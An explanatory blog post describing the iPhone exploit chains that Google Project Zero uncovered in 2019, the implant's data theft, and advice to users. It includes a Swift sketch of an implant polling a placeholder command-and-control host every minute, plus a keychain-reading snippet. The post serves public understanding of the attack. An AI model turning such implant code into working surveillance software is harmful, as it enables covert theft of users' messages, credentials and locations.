The iPhone Hack: What you need to know
A few days ago, one of Google’s security teams, Project Zero, revealed a chilling and truly massive hack of Apple’s iPhone that had been going on for at least two years. Running with the phone’s “God-mode” privileges, the attackers could access everything, even encrypted messages. Encryption wasn’t broken; the messages were simply taken, unencrypted, straight from the user’s screen. And users were tracked by GPS, with their locations recorded once a minute.
What happened?
Google’s Project Zero is staffed by a team of security experts whose job is to find zero-day exploits in computer code. And ... I’ve probably lost you already. A what-day exploit?
OK, let’s backtrack a second. Computers start counting from zero, not one, so zero is as low as you can go. In computer jargon, “Day Zero” is the first day of anything – the start of a new project, the public release of a new app, or the very first day a company becomes aware of a weakness in their software that might be exploited by hackers. The more days that elapse after Day Zero, the less useful the exploit becomes – because the company has a chance to patch the flaw and users have a chance to download the fix. So a zero-day exploit is one that not even the company concerned is aware of. The only people who know about it are the people who discovered it, and if this happens to be a group of hackers ... well, it’s party time! Think of zero-day exploits as being gold nuggets encrusted with diamonds and dipped in chocolate and you’ll get the idea.
The Project Zero team have a policy of “responsible disclosure”. When they find a software vulnerability, they inform the manufacturer, then usually give them 90 days to fix the bug before making the details public. In this case, presumably because the researchers found not just one but a total of 14 vulnerabilities, they informed Apple on 1 February 2019 and gave the company a 7-day deadline before full disclosure. This resulted in the surprise release of iOS 12.1.4 on 7 February, along with Apple’s public disclosure of the weakness – though you might be excused for not having noticed. The security update concerned lists four fixes, with this as number two:
Foundation
Available for: iPhone 5s and later, iPad Air and later, and iPod touch 6th generation.
Impact: An application may be able to gain elevated privileges.
Description: A memory corruption issue was addressed with improved input validation.
CVE-2019-7286: an anonymous researcher, Clement Lecigne of Google Threat Analysis Group, Ian Beer of Google Project Zero, and Samuel Groß of Google Project Zero
Anatomy of the attack
The whole thing might have been brushed under the carpet – as many of these cock-ups are – except that the Project Zero team have spent the last few months investigating the mechanisms and methods used by the hackers. On 29 August, they published their findings in a post called A very deep dive into iOS Exploit chains found in the wild and brought the whole embarrassing mess to light. This post is a mere introduction to the seven that follow – it’s a deep dive indeed – but here, in summary, is what we know ...
• For at least two years, someone has been indiscriminately hacking thousands – and possibly millions – of iPhones.
• The hack took advantage of 14 security flaws in the iPhone.
• The hack occurred when users visited certain websites. Just visiting one of these websites was enough. No further interaction was needed; no downloads, no sign-ups, no clicking on “I agree to your cookie policy” messages, just a visit.
• Details of which websites were involved have not yet been disclosed.
• A visit to one of these sites would see the hackers’ monitoring software implanted in the device.
• Shutting down and restarting the phone would clear the software, but revisiting the website would reinfect it.
Once infected:
... the implant [runs] in the background as root [i.e. “God mode”]. There is no visual indicator on the device that the implant is running. There's no way for a user on iOS to view a process listing, so the implant binary makes no attempt to hide its execution from the system.
The implant is primarily focused on stealing files and uploading live location data. The implant requests commands from a command and control server every 60 seconds.
(My italics. Source.)
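To make that last point concrete, here is a minimal sketch in Swift of the polling behaviour the quote describes – not the real implant code, which Google hasn’t published. The server URL and the command names are invented for illustration.

import Foundation

// A sketch of "requests commands from a command and control server every
// 60 seconds". Purely illustrative: the URL and commands are made up.
let c2URL = URL(string: "https://command-server.example/commands")!

func pollForCommands() {
    URLSession.shared.dataTask(with: c2URL) { data, _, _ in
        guard let data = data,
              let command = String(data: data, encoding: .utf8) else { return }
        // The real implant acted on commands to upload files, the keychain,
        // live GPS fixes and so on; here we just print what came back.
        print("received command: \(command)")
    }.resume()
}

// Poll once a minute for as long as the process stays alive.
Timer.scheduledTimer(withTimeInterval: 60, repeats: true) { _ in
    pollForCommands()
}
RunLoop.main.run()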
What was accessed?
In short, pretty much everything.
Encrypted files: The implant had access to the database files used by popular encrypted-messaging apps such as WhatsApp, Telegram and iMessage. The stolen content contained the unencrypted, plain text of the messages sent and received. There was no need to break the encryption; the messages were simply taken from the device after the apps had decrypted them.
Email and private messages: All Gmail messages and conversations on Google Hangouts were uploaded by the implant.
Contacts: The implant took copies of the user’s complete contacts database.
Photos: Yep, them too.
GPS tracking: If the device was online, the implant uploaded the user’s location once per minute.
Keychain: A device’s keychain contains a huge number of credentials and certificates used by the device. For example, if your phone connects to your home Wi-Fi network, the SSID and password are stored in the keychain to save you having to re-enter them each time you get home. The keychain also contains tokens used by services such as Google's single sign-on, which allow Google apps to access the user's account. By uploading these, the attackers could maintain access to the user’s account even once the implant was no longer running!
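For the curious, here is roughly what reading a single keychain item looks like in Swift, using Apple’s Security framework. A normal, sandboxed app can only read its own entries; the implant, running as root, could dump the lot. The service and account names below are made up.

import Foundation
import Security

// Illustrative only: fetch one stored secret from the keychain.
func readStoredSecret(service: String, account: String) -> String? {
    let query: [String: Any] = [
        kSecClass as String: kSecClassGenericPassword,
        kSecAttrService as String: service,
        kSecAttrAccount as String: account,
        kSecReturnData as String: true,
        kSecMatchLimit as String: kSecMatchLimitOne
    ]
    var item: CFTypeRef?
    guard SecItemCopyMatching(query as CFDictionary, &item) == errSecSuccess,
          let data = item as? Data else { return nil }
    return String(data: data, encoding: .utf8)
}

// e.g. readStoredSecret(service: "HomeWiFi", account: "my-router")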
Whodunnit?
The implications are huge. The fact that this attack used 14 zero-day exploits and went undetected for at least two years is a massive slap in the face for Apple, and the iPhone’s reputation as being secure and virtually unhackable is in tatters. What’s more, in the words of Project Zero’s Ian Beer, this attack shows “the capability to target and monitor the private activities of entire populations in real time.”
So whodunnit? We don’t know yet. Google hasn't released details of the malicious servers involved or where they were hosted, but the number of exploits used and the sheer scale of the attack suggest a state sponsor. As Beer puts it: “To be targeted might mean simply being born in a certain geographic region or being part of a certain ethnic group.”
Twenty years ago, if I’d suggested that in the future everyone would carry a personal tracker that gave governments, corporations and malicious individuals access to all our movements, private communications, contacts and photograph albums, there’d have been outrage. Now we rush out and buy them and boast about them to our friends.
What can iPhone users do?
It’s a two-step process:
1. Make sure you have the very latest security update. Go here.
2. Pray Apple haven't fucked up again.
Given the increasing sophistication of these attacks, that’s about all you can do. Apart from switching the damn thing off.